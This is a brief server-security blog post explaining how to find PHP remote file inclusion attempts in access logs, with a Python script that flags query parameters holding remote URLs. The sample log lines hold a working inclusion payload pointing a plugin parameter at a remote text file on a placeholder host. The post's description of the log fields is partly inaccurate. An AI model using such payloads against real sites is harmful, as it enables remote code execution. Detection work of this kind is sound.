How to find PHP injection through logs

URL injection: an attempt to inject or load files onto the server through PHP/CGI vulnerabilities.

Sample log report, including the date and time stamp. The 1st field is "request", the 2nd field is the IP address or domain name being attacked, and the 3rd field is the IP address or domain name of the attacker.

Request - IP attacked - IP of attacker

————————————————————————————————

Request: xxxx.com 111.222.333.444 - - [19/Apr/2009:08:35:02 -0500] "GET /?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0" SesohkAx1jYAAFNIEg0 "-"

Request: xxxx.com 111.222.333.444 - - [19/Apr/2009:08:35:03 -0500] "GET /fanzine/?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0" Sesoh0Ax1jYAAFN@Eng "-"

————————————————————————————————
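
One way to pull entries like the two above out of a larger access log, as an added example that is not part of the original post: it parses each line in the layout shown and reports every query parameter whose decoded value is a remote URL. The function name, the scheme list and the two extra sample lines are assumptions made for this sketch.

```python
import re
from urllib.parse import parse_qsl

# Layout shown on the page: vhost, client IP, ident, user, [time], "request", status, ...
LINE_RE = re.compile(
    r'^(?:Request:\s+)?(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# Assumption: a parameter value that starts with one of these schemes is worth flagging.
REMOTE_VALUE_RE = re.compile(r'^\s*(?:https?|ftps?)://', re.IGNORECASE)


def find_remote_includes(lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in the expected layout; skip rather than guess
        query = m.group("target").partition("?")[2]
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_VALUE_RE.match(value):
                findings.append({
                    "time": m.group("time"), "vhost": m.group("vhost"),
                    "client": m.group("client"), "status": int(m.group("status")),
                    "param": name, "value": value,
                })
    return findings


# The page's two entries, followed by two constructed lines (not real traffic).
SAMPLE = [
    'Request: xxxx.com 111.222.333.444 - - [19/Apr/2009:08:35:02 -0500] "GET /?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0" SesohkAx1jYAAFNIEg0 "-"',
    'Request: xxxx.com 111.222.333.444 - - [19/Apr/2009:08:35:03 -0500] "GET /fanzine/?custompluginfile[]=http://yyyy.com/images/copyright.txt?? HTTP/1.1" 500 3572 "-" "Mozilla/5.0" Sesoh0Ax1jYAAFN@Eng "-"',
    # constructed: ordinary request, must not be flagged
    'xxxx.com 192.0.2.10 - - [19/Apr/2009:08:36:10 -0500] "GET /fanzine/?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0" - "-"',
    # constructed: same pattern with the URL percent-encoded
    'xxxx.com 192.0.2.11 - - [19/Apr/2009:08:37:41 -0500] "GET /index.php?inc=http%3A%2F%2Fexample.org%2Fa.txt HTTP/1.1" 404 310 "-" "Mozilla/5.0" - "-"',
]

if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE):
        print(f"{f['time']} {f['vhost']} <- {f['client']} [{f['status']}] {f['param']}={f['value']}")
```

The status code is kept in each finding so the requests can be sorted by how the server answered them.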


anees

Posted in Issues, Scripts, Server Security
One comment on “How to find PHP injection through logs”
  1. Thank you for some other magnificent post. Where else may just anyone get that kind of info in such a perfect means of writing? I’ve a presentation next week, and I am at the search for such info.

